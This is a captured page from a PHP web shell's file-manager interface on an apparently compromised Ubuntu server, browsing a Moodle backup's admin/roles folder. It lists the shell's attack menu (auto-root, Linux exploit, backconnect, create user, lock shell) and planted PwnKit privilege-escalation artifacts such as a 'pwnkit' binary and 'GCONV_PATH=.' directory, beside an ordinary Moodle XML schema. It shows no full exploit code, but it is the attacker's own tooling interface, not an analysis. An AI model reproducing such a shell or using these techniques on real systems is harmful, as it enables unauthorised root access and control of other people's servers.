Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
admin /
roles /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
admins.php
5.63
KB
-rw-rw-r--
ajax.php
2.66
KB
-rw-rw-r--
allow.php
3.04
KB
-rw-rw-r--
assign.php
12.03
KB
-rw-rw-r--
check.php
6.99
KB
-rw-rw-r--
define.php
10.64
KB
-rw-rw-r--
lib.php
2.16
KB
-rw-rw-r--
manage.php
7.67
KB
-rw-rw-r--
managetabs.php
1.7
KB
-rw-rw-r--
module.js
6.69
KB
-rw-rw-r--
override.php
7.49
KB
-rw-rw-r--
permissions.php
9.91
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
role_schema.xml
2.96
KB
-rw-rw-r--
usersroles.php
8.16
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : role_schema.xml
<?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified"> <xs:element name="role"> <xs:complexType> <xs:sequence> <xs:element ref="shortname" minOccurs="0"/> <xs:element ref="name" minOccurs="0"/> <xs:element ref="description" minOccurs="0"/> <xs:element ref="archetype" minOccurs="0"/> <xs:element ref="contextlevels" minOccurs="0"/> <xs:element ref="allowassign" minOccurs="0"/> <xs:element ref="allowoverride" minOccurs="0"/> <xs:element ref="allowswitch" minOccurs="0"/> <xs:element ref="allowview" minOccurs="0"/> <xs:element ref="permissions" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="archetype" type="xs:string"/> <xs:element name="contextlevels"> <xs:complexType> <xs:sequence> <xs:element minOccurs="0" maxOccurs="unbounded" ref="level"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="level" type="xs:string"/> <xs:element name="allowassign"> <xs:complexType> <xs:sequence> <xs:element maxOccurs="unbounded" minOccurs="0" ref="shortname"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="allowoverride"> <xs:complexType> <xs:sequence> <xs:element maxOccurs="unbounded" minOccurs="0" ref="shortname"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="allowswitch"> <xs:complexType> <xs:sequence> <xs:element maxOccurs="unbounded" minOccurs="0" ref="shortname"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="allowview"> <xs:complexType> <xs:sequence> <xs:element maxOccurs="unbounded" minOccurs="0" ref="shortname"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="permissions"> <xs:complexType> <xs:sequence> <xs:element ref="inherit" minOccurs="0" maxOccurs="unbounded"/> <xs:element ref="allow" minOccurs="0" maxOccurs="unbounded"/> <xs:element ref="prevent" minOccurs="0" maxOccurs="unbounded"/> <xs:element ref="prohibit" minOccurs="0" maxOccurs="unbounded"/> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="shortname" type="xs:string"/> <xs:element name="name" type="xs:string"/> <xs:element name="description" type="xs:string"/> <xs:element name="inherit" type="xs:string"/> <xs:element name="allow" type="xs:string"/> <xs:element name="prevent" type="xs:string"/> <xs:element name="prohibit" type="xs:string"/> </xs:schema>
Close